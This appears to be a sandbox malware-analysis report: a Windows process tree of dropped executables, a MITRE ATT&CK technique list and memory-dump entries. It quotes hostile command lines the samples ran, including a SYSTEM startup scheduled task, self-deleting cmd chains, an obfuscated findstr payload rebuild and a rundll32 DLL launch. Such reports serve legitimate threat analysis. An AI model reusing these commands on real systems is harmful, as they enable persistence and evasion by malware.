        
        PID:2516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsx678B.tmp\tempfile.ps1"
        7⤵
        
        PID:4244
        
        C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
        
        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4992
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ds3t0f1k.l12\GcleanerWW.exe /mixone & exit
        5⤵
        
        PID:4856
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\on4mguq2.rgl\inst.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4500
      - C:\Users\Admin\AppData\Local\Temp\on4mguq2.rgl\inst.exe
        
        C:\Users\Admin\AppData\Local\Temp\on4mguq2.rgl\inst.exe
        6⤵
        Executes dropped EXE
        
        PID:4444
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q52dym3y.no3\c7ae36fa.exe & exit
        5⤵
        
        PID:5068
      - C:\Users\Admin\AppData\Local\Temp\q52dym3y.no3\c7ae36fa.exe
        
        C:\Users\Admin\AppData\Local\Temp\q52dym3y.no3\c7ae36fa.exe
        6⤵
        
        PID:4872
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5yixqc24.0ki\app.exe /8-2222 & exit
        5⤵
        
        PID:4696
      - C:\Users\Admin\AppData\Local\Temp\5yixqc24.0ki\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\5yixqc24.0ki\app.exe /8-2222
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2252
        
        C:\Users\Admin\AppData\Local\Temp\5yixqc24.0ki\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5yixqc24.0ki\app.exe" /8-2222
        7⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:4236

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4188

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4256

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4996

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:5108

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:4176

C:\Users\Admin\AppData\Local\Temp\8B68.exe
C:\Users\Admin\AppData\Local\Temp\8B68.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4620

C:\Users\Admin\AppData\Local\Temp\8D7C.exe
C:\Users\Admin\AppData\Local\Temp\8D7C.exe
1⤵
PID:5000

C:\Users\Admin\AppData\Local\Temp\A163.exe
C:\Users\Admin\AppData\Local\Temp\A163.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4192
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\A163.exe"
  2⤵
  PID:4760
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:4328

C:\Users\Admin\AppData\Local\Temp\ACDE.exe
C:\Users\Admin\AppData\Local\Temp\ACDE.exe
1⤵
- Executes dropped EXE
PID:4224

C:\Users\Admin\AppData\Local\Temp\B0D6.exe
C:\Users\Admin\AppData\Local\Temp\B0D6.exe
1⤵
- Executes dropped EXE
PID:3840

C:\Users\Admin\AppData\Local\Temp\BC60.exe
C:\Users\Admin\AppData\Local\Temp\BC60.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4628
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  2⤵
  PID:4864

C:\Users\Admin\AppData\Local\Temp\CF0F.exe
C:\Users\Admin\AppData\Local\Temp\CF0F.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4524
- C:\Users\Admin\AppData\Local\Temp\CF0F.exe
  "C:\Users\Admin\AppData\Local\Temp\CF0F.exe"
  2⤵
  - Executes dropped EXE
  PID:4520

C:\Users\Admin\AppData\Local\Temp\D970.exe
C:\Users\Admin\AppData\Local\Temp\D970.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4416
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\SysWOW64\explorer.exe"
  2⤵
  - Executes dropped EXE
  PID:4720
- - C:\Users\Admin\AppData\Roaming\32F3.tmp.exe
    "C:\Users\Admin\AppData\Roaming\32F3.tmp.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5000
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" "5000" "C:\Users\Admin\AppData\Roaming\32F3.tmp.exe""
      4⤵
      PID:4536
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID "5000"
        5⤵
        Kills process with taskkill
        
        PID:4384
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2200
- - C:\Users\Admin\AppData\Roaming\35D2.tmp.exe
    "C:\Users\Admin\AppData\Roaming\35D2.tmp.exe"
    3⤵
    - Executes dropped EXE
    PID:4560
- - C:\Users\Admin\AppData\Roaming\369E.tmp.exe
    "C:\Users\Admin\AppData\Roaming\369E.tmp.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5024
  - - C:\Windows\SysWOW64\explorer.exe
      "C:\Windows\SysWOW64\explorer.exe"
      4⤵
      PID:5028
  - - C:\Windows\SysWOW64\explorer.exe
      "C:\Windows\SysWOW64\explorer.exe"
      4⤵
      PID:4272
  - - C:\Windows\SysWOW64\explorer.exe
      "C:\Windows\SysWOW64\explorer.exe"
      4⤵
      Drops startup file
      PID:4480
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Windows\SysWOW64\explorer.exe" >> NUL
    3⤵
    PID:5040
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:1980

C:\Users\Admin\AppData\Local\Temp\E383.exe
C:\Users\Admin\AppData\Local\Temp\E383.exe
1⤵
- Executes dropped EXE
- Drops startup file
- NTFS ADS
PID:780

C:\Users\Admin\AppData\Local\Temp\E922.exe
C:\Users\Admin\AppData\Local\Temp\E922.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3980

C:\Users\Admin\AppData\Local\Temp\F613.exe
C:\Users\Admin\AppData\Local\Temp\F613.exe
1⤵
- Executes dropped EXE
PID:2880

C:\Users\Admin\AppData\Local\Temp\FCEA.exe
C:\Users\Admin\AppData\Local\Temp\FCEA.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3640

C:\Users\Admin\AppData\Local\Temp\47D.exe
C:\Users\Admin\AppData\Local\Temp\47D.exe
1⤵
- Executes dropped EXE
PID:4400
- C:\Windows\SysWOW64\makecab.exe
  "C:\Windows\System32\makecab.exe"
  2⤵
  PID:4272
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c iqNOHdjFJRyhysPKrZOyDFL & okDksJPSlGbcVRHiSeznxx & hAaVTUKoBgyGcM & gqwjrmT & cmd < Estate.wms
  2⤵
  PID:4464
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    PID:2528
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^IRYjqEeSlHqUOmgNEQyuRToTmXianaMtsAbasYwuofIOxmdrAdyKMFuPItNebJxSVVDheWcGOYXClxmZHrSojeaLxIJhlZImVQSnVewEUmVNHEEgENczQjFTDRTzjocPdnGzBwrEwghMuFtPrc$" Tele.wms
      4⤵
      PID:4112
  - - C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\Diritto.exe.com
      Diritto.exe.com o
      4⤵
      Executes dropped EXE
      PID:3812
    - - C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\Diritto.exe.com
        
        C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\Diritto.exe.com o
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5028
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "xNBSMJllYe" /tr "C:\\Users\\Admin\\AppData\\Roaming\\gXjmjGiawO\\xNBSMJllYe.exe.com C:\\Users\\Admin\\AppData\\Roaming\\gXjmjGiawO\\Q" /sc onstart /F /RU SYSTEM
        6⤵
        Creates scheduled task(s)
        
        PID:4880
      - C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\RegAsm.exe
        6⤵
        Executes dropped EXE
        
        PID:4764
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 30
      4⤵
      Runs ping.exe
      PID:4368

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2220

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5068

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4784

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:4872

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4456

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:2240

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4768

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:3000

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4644

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4716

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5096

C:\Users\Admin\AppData\Roaming\euvttjs
C:\Users\Admin\AppData\Roaming\euvttjs
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4880
- C:\Users\Admin\AppData\Roaming\euvttjs
  C:\Users\Admin\AppData\Roaming\euvttjs
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:1664

C:\Users\Admin\AppData\Roaming\swvttjs
C:\Users\Admin\AppData\Roaming\swvttjs
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4380

C:\Users\Admin\AppData\Local\Temp\8B26.exe
C:\Users\Admin\AppData\Local\Temp\8B26.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2172
- C:\Users\Admin\AppData\Local\Temp\8B26.exe
  "C:\Users\Admin\AppData\Local\Temp\8B26.exe"
  2⤵
  - Executes dropped EXE
  PID:4232

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4148

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4548

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3076

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5096

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:496

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4880

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3936

C:\Users\Admin\AppData\Roaming\euvttjs
C:\Users\Admin\AppData\Roaming\euvttjs
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3380
- C:\Users\Admin\AppData\Roaming\euvttjs
  C:\Users\Admin\AppData\Roaming\euvttjs
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:3304

C:\Users\Admin\AppData\Roaming\swvttjs
C:\Users\Admin\AppData\Roaming\swvttjs
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4364

C:\Windows\system32\rundll32.exe
C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\AotYqZ\AotYqZ.dll",AotYqZ
1⤵
- Windows security modification
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4612

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4976

C:\Users\Admin\AppData\Roaming\euvttjs
C:\Users\Admin\AppData\Roaming\euvttjs
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2120
- C:\Users\Admin\AppData\Roaming\euvttjs
  C:\Users\Admin\AppData\Roaming\euvttjs
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:4400

C:\Users\Admin\AppData\Roaming\swvttjs
C:\Users\Admin\AppData\Roaming\swvttjs
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3988

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

BITS Jobs

T1197

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

BITS Jobs

T1197

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/388-203-0x00000000024A0000-0x00000000024B7000-memory.dmp

Filesize
92KB

Download
memory/388-220-0x00000000001B0000-0x00000000001C5000-memory.dmp

Filesize
84KB

Download
memory/512-114-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/780-360-0x0000000000400000-0x0000000002BBC000-memory.dmp

Filesize
39.7MB

Download
memory/780-359-0x0000000002CA0000-0x0000000002DEA000-memory.dmp

Filesize
1.3MB

Download
memory/896-119-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/1012-151-0x0000000001205000-0x0000000001206000-memory.dmp

Filesize
4KB

Download
memory/1012-148-0x0000000001202000-0x0000000001204000-memory.dmp

Filesize
8KB

Download
memory/1012-146-0x0000000001200000-0x0000000001202000-memory.dmp

Filesize
8KB

Download
memory/1508-140-0x0000000000C30000-0x0000000000C32000-memory.dmp

Filesize
8KB

Download
memory/2200-223-0x0000000007910000-0x0000000007911000-memory.dmp

Filesize
4KB

Download
memory/2200-265-0x0000000009B70000-0x0000000009B71000-memory.dmp

Filesize
4KB

Download
memory/2200-226-0x0000000008090000-0x0000000008091000-memory.dmp

Filesize
4KB

Download
memory/2200-268-0x000000000A1A0000-0x000000000A1A1000-memory.dmp

Filesize
4KB

Download
memory/2200-225-0x00000000078D0000-0x00000000078D1000-memory.dmp

Filesize
4KB

Download
memory/2200-224-0x00000000072D2000-0x00000000072D3000-memory.dmp

Filesize
4KB

Download
memory/2200-279-0x000000000AD20000-0x000000000AD21000-memory.dmp

Filesize
4KB

Download
memory/2200-243-0x0000000008030000-0x0000000008031000-memory.dmp

Filesize
4KB

Download
memory/2200-227-0x0000000007F40000-0x0000000007F41000-memory.dmp

Filesize
4KB

Download
memory/2200-245-0x00000000089C0000-0x00000000089C1000-memory.dmp

Filesize
4KB

Download
memory/2200-222-0x0000000007240000-0x0000000007241000-memory.dmp

Filesize
4KB

Download
memory/2200-244-0x0000000008550000-0x0000000008551000-memory.dmp

Filesize
4KB

Download
memory/2200-266-0x0000000009890000-0x0000000009891000-memory.dmp

Filesize
4KB

Download
memory/2200-221-0x00000000072D0000-0x00000000072D1000-memory.dmp

Filesize
4KB

Download
memory/2200-267-0x00000000098E0000-0x00000000098E1000-memory.dmp

Filesize
4KB

Download
memory/2200-228-0x0000000008200000-0x0000000008201000-memory.dmp

Filesize
4KB

Download
memory/2200-291-0x00000000072D3000-0x00000000072D4000-memory.dmp

Filesize
4KB

Download
memory/2240-316-0x00000000047A3000-0x00000000047A4000-memory.dmp

Filesize
4KB

Download
memory/2240-310-0x00000000047A0000-0x00000000047A1000-memory.dmp

Filesize
4KB

Download
memory/2240-311-0x00000000047A2000-0x00000000047A3000-memory.dmp

Filesize
4KB

Download
memory/2252-219-0x0000000000400000-0x00000000041D7000-memory.dmp

Filesize
61.8MB

Download
memory/2252-216-0x00000000048B0000-0x00000000051BA000-memory.dmp

Filesize
9.0MB

Download
memory/2464-126-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2624-149-0x0000000000C84000-0x0000000000C85000-memory.dmp

Filesize
4KB

Download
memory/2624-147-0x0000000000C82000-0x0000000000C84000-memory.dmp

Filesize
8KB

Download
memory/2624-150-0x0000000000C85000-0x0000000000C87000-memory.dmp

Filesize
8KB

Download
memory/2624-141-0x0000000000C80000-0x0000000000C82000-memory.dmp

Filesize
8KB

Download
memory/2880-361-0x00000000001D0000-0x0000000000200000-memory.dmp

Filesize
192KB

Download
memory/3640-123-0x0000000002F50000-0x0000000002F52000-memory.dmp

Filesize
8KB

Download
memory/3640-176-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/3644-269-0x0000000010000000-0x0000000010116000-memory.dmp

Filesize
1.1MB

Download
memory/3828-131-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/3840-342-0x00000000056F0000-0x0000000005CF6000-memory.dmp

Filesize
6.0MB

Download
memory/3980-356-0x0000000003FE0000-0x0000000004071000-memory.dmp

Filesize
580KB

Download
memory/3980-357-0x0000000000400000-0x0000000003DF6000-memory.dmp

Filesize
58.0MB

Download
memory/3984-180-0x0000000000030000-0x000000000003C000-memory.dmp

Filesize
48KB

Download
memory/4192-337-0x00000000040D0000-0x0000000004161000-memory.dmp

Filesize
580KB

Download
memory/4192-338-0x0000000000400000-0x0000000003DF6000-memory.dmp

Filesize
58.0MB

Download
memory/4224-341-0x00000000052C0000-0x00000000052C1000-memory.dmp

Filesize
4KB

Download
memory/4236-302-0x0000000000400000-0x00000000041D7000-memory.dmp

Filesize
61.8MB

Download
memory/4320-322-0x0000000004AA0000-0x0000000004AA1000-memory.dmp

Filesize
4KB

Download
memory/4320-325-0x0000000004AA3000-0x0000000004AA4000-memory.dmp

Filesize
4KB

Download
memory/4320-323-0x0000000004AA2000-0x0000000004AA3000-memory.dmp

Filesize
4KB

Download
memory/4388-331-0x0000000005432000-0x0000000005433000-memory.dmp

Filesize
4KB

Download
memory/4388-330-0x0000000005430000-0x0000000005431000-memory.dmp

Filesize
4KB

Download
memory/4388-333-0x0000000005433000-0x0000000005434000-memory.dmp

Filesize
4KB

Download
memory/4416-353-0x000000001DFA0000-0x000000001DFA2000-memory.dmp

Filesize
8KB

Download
memory/4444-202-0x00000000004A0000-0x000000000054E000-memory.dmp

Filesize
696KB

Download
memory/4444-201-0x00000000001F0000-0x0000000000200000-memory.dmp

Filesize
64KB

Download
memory/4524-351-0x000000007EC70000-0x000000007EC71000-memory.dmp

Filesize
4KB

Download
memory/4524-350-0x00000000050F0000-0x00000000055EE000-memory.dmp

Filesize
5.0MB

Download
memory/4628-344-0x0000000005130000-0x0000000005131000-memory.dmp

Filesize
4KB

Download
memory/4644-229-0x00000000037F0000-0x0000000003800000-memory.dmp

Filesize
64KB

Download
memory/4644-235-0x0000000003990000-0x00000000039A0000-memory.dmp

Filesize
64KB

Download
memory/4660-186-0x0000000002E70000-0x0000000002F01000-memory.dmp

Filesize
580KB

Download
memory/4660-158-0x00000000001F0000-0x0000000000200000-memory.dmp

Filesize
64KB

Download
memory/4660-159-0x0000000000430000-0x000000000057A000-memory.dmp

Filesize
1.3MB

Download
memory/4660-187-0x0000000000400000-0x0000000002BF4000-memory.dmp

Filesize
40.0MB

Download
memory/4864-346-0x0000000004DB0000-0x00000000053B6000-memory.dmp

Filesize
6.0MB

Download
memory/4872-300-0x00000000083E0000-0x00000000083E1000-memory.dmp

Filesize
4KB

Download
memory/4872-304-0x0000000008D50000-0x0000000008D51000-memory.dmp

Filesize
4KB

Download
memory/4872-309-0x0000000007543000-0x0000000007544000-memory.dmp

Filesize
4KB

Download
memory/4872-321-0x0000000004863000-0x0000000004864000-memory.dmp

Filesize
4KB

Download
memory/4872-207-0x0000000000400000-0x0000000003DAF000-memory.dmp

Filesize
57.7MB

Download
memory/4872-205-0x0000000000030000-0x0000000000039000-memory.dmp

Filesize
36KB

Download
memory/4872-319-0x0000000004862000-0x0000000004863000-memory.dmp

Filesize
4KB

Download
memory/4872-318-0x0000000004860000-0x0000000004861000-memory.dmp

Filesize
4KB

Download
memory/4872-294-0x0000000007542000-0x0000000007543000-memory.dmp

Filesize
4KB

Download
memory/4872-292-0x0000000007540000-0x0000000007541000-memory.dmp

Filesize
4KB

Download
memory/5104-327-0x00000000045C2000-0x00000000045C3000-memory.dmp

Filesize
4KB

Download
memory/5104-329-0x00000000045C3000-0x00000000045C4000-memory.dmp

Filesize
4KB

Download
memory/5104-326-0x00000000045C0000-0x00000000045C1000-memory.dmp

Filesize
4KB

Download